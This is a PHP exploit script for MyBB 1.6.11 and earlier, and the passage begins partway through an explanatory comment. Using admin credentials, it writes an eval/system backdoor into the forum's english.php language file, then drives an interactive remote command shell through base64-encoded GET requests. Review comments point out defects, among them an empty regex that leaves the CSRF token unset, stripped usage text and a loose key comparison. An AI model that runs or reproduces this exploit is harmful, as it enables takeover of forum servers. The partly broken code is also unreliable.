input['info'] as $key => $info) {
    $info = str_replace("\\", "\\\\", $info);
    $info = str_replace('$', '\$', $info);
    $newlanginfo[$key] = str_replace("\"", '\"', $info);
}

and Line 69:

\$langinfo['admin'] = {$newlanginfo['admin']};

Backslashes, dollar signs and double quotes are escaped, but info[admin] is interpolated
into the generated language file without surrounding quotes (MyBB treats it as an integer),
so that escaping is irrelevant for this one field: whatever is submitted as info[admin] is
written as bare PHP into inc/languages/english.php. That is enough to run PHP by writing a
function call into it. Below is a very simple exploit that does that job for you. Remember
that you need admin credentials: this is a post-authentication, admin-only issue, not a
pre-auth one. */

// Banner.
echo "#######################################################################\n";
echo "# MyBB <= 1.6.11 Remote Code Execution Using Admin Privileges #\n";
echo "# By BlackDream @ p0wnbox.com #\n";
echo "#######################################################################\n\n";

// CLI only: under a web SAPI $argc is undefined, the negation is true and we exit.
// Usage: php <this-file> <forum-url> <admin-username> <admin-password>
// NOTE(review): the usage string below appears to have lost its "<url> <username> <password>"
// placeholders when this listing was extracted (angle-bracketed text stripped); the three
// positional arguments are read from $argv just below. Passing the admin password on the
// command line exposes it to other local users via the process list and shell history.
if ( ! $argc ) {
    exit( "You can't run this script from your browser" );
} elseif ( $argc != 4 ) {
    die( "Example Usage: php " . basename( __file__ ) . " \n\nProvide the myBB forum URL WITHOUT the admin panel directory\n" );
}

$url = $argv[1];       // forum base URL, without the /admin directory
$username = $argv[2];
$password = $argv[3];

//Is this URL A Valid MyBB Forum?
std_echo( "Validate URL...", "*" );
if ( ! ValidateMyBB( $url ) ) {
    std_echo( "Couldn't Validate URL", "-" );
    exit( 1 );
}

//Login
std_echo( "Logging In...", "*" );
if ( ! login( $username, $password ) ) {
    std_echo( "Couldn't Login", "-" );
    exit( 1 );
}

std_echo( "Working...", "*" );

// Per-run key that the planted stub checks before executing anything, so that a third party
// who stumbles on the modified english.php cannot drive it. md5(uniqid(rand(), true)) is not a
// CSPRNG (rand() and uniqid() are predictable), so treat this as an identifier rather than a
// secret; see also the loose "==" comparison noted in get_posted_vars().
$key = md5( uniqid( rand(), true ) ); //generate a unique key to prevent all the others

// Plant: fetch the current language-properties form (and its CSRF token), then POST it back
// with info[admin] replaced by the eval() stub.
$vars_to_post = get_posted_vars( true, $key );
do_backdoor( $vars_to_post );

// Interactive loop: each command is base64-encoded and sent as a GET parameter to the now
// modified english.php, so every command ends up (base64) in the web server's access logs.
// "exit" itself is also sent to the target and passed to system() before the loop ends.
do {
    echo "shell(AV: exit)> ";
    $command = get_input();
    $command_enc = base64_encode( $command );
    echo file_get_contents( $url . "/inc/languages/english.php?key=$key&exploited=$command_enc" );
} while ( $command != "exit" );

//remove our backdoor
// This sets info[admin] back to 1 but also rewrites every other property to the hard-coded
// defaults in get_posted_vars(), not to the target's original values. do_backdoor() discards
// the HTTP response, so a failed restore (expired session, missing post key) goes unnoticed
// and leaves the stub in place; check english.php on the target afterwards.
$vars_to_post = get_posted_vars( false );
do_backdoor( $vars_to_post );

// Read one line from STDIN (fgets with a 255-byte limit) and return it trimmed.
function get_input( ) {
    $input = trim( fgets( STDIN, 255 ) );
    return $input;
}

// POST the given field set to the admin "edit language properties" handler, authenticating
// with the session cookie that login() saved to cookie.txt. The response is read into $source
// and never inspected, so callers cannot tell whether the write succeeded. The curl handle is
// not closed.
//   $vars_to_post : fields as built by get_posted_vars()
function do_backdoor( $vars_to_post ) {
    global $url;
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, $url . '/admin/index.php?module=config-languages&action=edit_properties' );
    curl_setopt( $ch, CURLOPT_POST, 1 );
    curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $vars_to_post ) );
    curl_setopt( $ch, CURLOPT_COOKIEFILE, 'cookie.txt' );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
    $source = curl_exec( $ch ); // result not checked
}

// Fetch the english language-properties form and build the POST body for do_backdoor().
//   $do_backdoor : true  -> info[admin] becomes the eval() stub
//                  false -> info[admin] is set back to 1 (restore run)
//   $key         : per-run key embedded in the stub (only used when $do_backdoor is true)
// Returns the field array, or false when the post key cannot be extracted from the page.
function get_posted_vars( $do_backdoor, $key = '' ) {
    global $url;
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, $url . '/admin/index.php?module=config-languages&action=edit_properties&lang=english' );
    curl_setopt( $ch, CURLOPT_COOKIEFILE, 'cookie.txt' );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
    $source = curl_exec( $ch );
    $vars_to_post = array();
    // NOTE(review): "//" is an empty regex. It always matches and has no capture group, so
    // $matches[1] is never set and my_post_key (MyBB's CSRF token) is posted empty. The original
    // listing presumably had a pattern here that captured the hidden my_post_key input's value;
    // it looks like it was stripped as HTML during extraction. As written this function cannot
    // produce a valid request.
    if ( preg_match( "//", $source, $matches ) ) {
        $vars_to_post['my_post_key'] = $matches[1];
        $vars_to_post['lang'] = "english";
        // Hard-coded values for the stock english pack. They overwrite whatever the target
        // currently has, on both the plant and the restore run.
        $vars_to_post['info[author]'] = "MyBulletinBoard";
        $vars_to_post['info[website]'] = "http://www.mybb.com";
        $vars_to_post['info[author]'] = "MyBulletinBoard"; // duplicate of the assignment two lines up
        $vars_to_post['info[version]'] = "1610";
        $vars_to_post['info[name]'] = "English (American)";
        $vars_to_post['info[htmllang]'] = "en";
        $vars_to_post['info[charset]'] = "UTF-8";
        $vars_to_post['info[rtl]'] = "0";
        $vars_to_post['info[admin]'] = 1;
        //generating UNIQUE MD5
        if ( $do_backdoor ) {
            // Stub that ends up in english.php. Its key check uses loose "==": if the generated
            // md5 happens to have the form 0e<digits>, PHP compares it numerically and any
            // numeric string equal to zero (e.g. key=0) passes the guard. A strict "===" (or
            // hash_equals()) would avoid that type-juggling case.
            $payload = 'if(isset($_GET["exploited"]) && $_GET["key"] == "' . $key . '") { system(base64_decode($_GET["exploited"])); }';
            $payload = base64_encode( $payload );
            $vars_to_post['info[admin]'] = "eval(base64_decode('$payload'))";
        }
        return $vars_to_post;
    }
    return false;
}

// Log in to the admin panel and persist the session cookie to cookie.txt in the current
// directory. The file is never deleted, so the admin session cookie stays on disk after the
// run. Returns the offset of 'Logged in as' in the response, or false when absent; the caller
// treats this as a boolean, so an offset of 0 would be read as a failed login.
function login( $username, $password ) {
    global $url;
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, $url . "/admin/index.php" );
    curl_setopt( $ch, CURLOPT_POST, 1 );
    // Values are concatenated raw rather than url-encoded: a password containing '&', '=',
    // '%' or '+' will not arrive intact.
    curl_setopt( $ch, CURLOPT_POSTFIELDS, 'username=' . $username . '&password=' . $password . "&do=login" );
    curl_setopt( $ch, CURLOPT_COOKIEJAR, 'cookie.txt' );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
    $source = curl_exec( $ch );
    return strpos( $source, 'Logged in as' );
}

// Heuristic check that $url is a MyBB install: fetch /admin/ and look for "MyBB Control Panel".
// Errors from file_get_contents() are silenced with @, so DNS, TLS and HTTP failures all
// surface only as the generic "Couldn't Validate URL" message. Returns the marker's offset
// (0 is falsy, same caveat as login()) or false.
function ValidateMyBB( $url ) {
    $source = @file_get_contents( $url . "/admin/" );
    if ( $source ) {
        return stripos( $source, "MyBB Control Panel" );
    }
    return false;
}

// Print one status line prefixed with a one-character tag, e.g. "[*] Working...".
function std_echo( $message, $ch ) {
    echo "[$ch] $message\n";
}
?>